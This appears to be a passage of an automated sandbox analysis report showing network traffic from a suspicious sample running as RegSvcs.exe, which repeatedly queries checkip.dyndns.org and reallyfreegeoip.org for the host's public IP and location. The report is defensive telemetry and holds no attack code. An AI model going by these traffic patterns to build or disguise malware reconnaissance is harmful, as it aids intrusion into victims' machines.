Jan 2, 2025 20:19:59.064316034 CET	80	49796	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:59.114412069 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.171827078 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.171875954 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.171946049 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.172903061 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.172918081 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.404181004 CET	49788	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.404272079 CET	49730	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.633011103 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.635337114 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.635364056 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.761915922 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.761982918 CET	443	49802	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:59.762042046 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.762656927 CET	49802	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:59.766467094 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.767774105 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.771476030 CET	80	49796	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:59.771533012 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.772557974 CET	80	49808	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:59.772653103 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.772780895 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:59.777533054 CET	80	49808	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:01.156280994 CET	80	49808	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:01.157491922 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.157520056 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.157593012 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.158078909 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.158092022 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.208101988 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.661087990 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.708112001 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.833102942 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.833112955 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.950556040 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.950635910 CET	443	49818	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:01.950674057 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.951241970 CET	49818	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:01.956188917 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.958147049 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.961127043 CET	80	49808	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:01.961205959 CET	49808	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.962970018 CET	80	49820	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:01.963046074 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.966063023 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:01.970916986 CET	80	49820	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:08.155570030 CET	80	49820	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:08.157032967 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.157077074 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.157179117 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.157449007 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.157459974 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.208240986 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.687239885 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.700433969 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.700460911 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.842045069 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.842109919 CET	443	49860	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:08.842181921 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.842633963 CET	49860	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:08.845844984 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.847084045 CET	49866	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.850756884 CET	80	49820	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:08.850841045 CET	49820	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.851895094 CET	80	49866	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:08.851974010 CET	49866	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.852072001 CET	49866	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:08.856827974 CET	80	49866	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:15.185223103 CET	80	49866	158.101.44.242	192.168.2.6
Jan 2, 2025 20:20:15.187141895 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:15.187186003 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.187331915 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:15.187668085 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:15.187681913 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.239375114 CET	49866	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:15.641324997 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.642980099 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:15.643023014 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.806461096 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.806520939 CET	443	49905	188.114.96.3	192.168.2.6
Jan 2, 2025 20:20:15.806644917 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:15.807380915 CET	49905	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:20:16.038572073 CET	49866	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:20:16.038698912 CET	49773	80	192.168.2.6	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:19:48.626708031 CET	58877	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:19:48.633893013 CET	53	58877	1.1.1.1	192.168.2.6
Jan 2, 2025 20:19:49.571917057 CET	62211	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:19:49.581072092 CET	53	62211	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 20:19:48.626708031 CET	192.168.2.6	1.1.1.1	0x94d8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:49.571917057 CET	192.168.2.6	1.1.1.1	0xb869	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:48.633893013 CET	1.1.1.1	192.168.2.6	0x94d8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:49.581072092 CET	1.1.1.1	192.168.2.6	0xb869	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:19:49.581072092 CET	1.1.1.1	192.168.2.6	0xb869	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:48.644891024 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:49.335344076 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10e22aa3fdb468d0eeba7dc65d6eabe0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:19:49.339862108 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:49.493112087 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3f6068f0f2e496ac9c59c904c5096c44 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:19:50.483355999 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:50.643948078 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ecac0b620e8efccf3c6c6e9cfbac88b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49730	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:51.378695011 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:51.961796045 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d9a00bc261de269513086a5906a3d4e6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49744	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:52.612618923 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:53.200840950 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 321eedcb4a7206eae7692ef2668320b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49751	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:53.625006914 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:54.244529009 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3e694d7336e8fc216d5881a486ccde13 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:19:54.278374910 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:54.438652992 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee758f2ea146a564d4f8b7475d75123a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 20:19:55.225760937 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:55.381191969 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4415f98338812f43d53f484b066cee17 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49752	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:53.874722958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:54.512809038 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1df540982449a97f957537f1014f88cd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49765	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:55.204545975 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:55.784729004 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e5caaa094d5ab24e60793216216ba5d7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49773	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:55.997761011 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 20:19:56.602184057 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49540667248db426c947675e9069be35 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49774	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:56.439162016 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:57.001216888 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 214166ae059a5644d9d210b60cb9132a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49783	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:57.230875969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:57.808128119 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4c65752e01f8495fccfd8707f5e87c25 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49788	158.101.44.242	80	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:57.631274939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:58.206990957 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 50f5da19e8dd303c18aeafd8c05e9734 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49796	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:58.489653111 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:19:59.064316034 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bf58120988f4c5709a60842579c7d68b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49808	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:19:59.772780895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
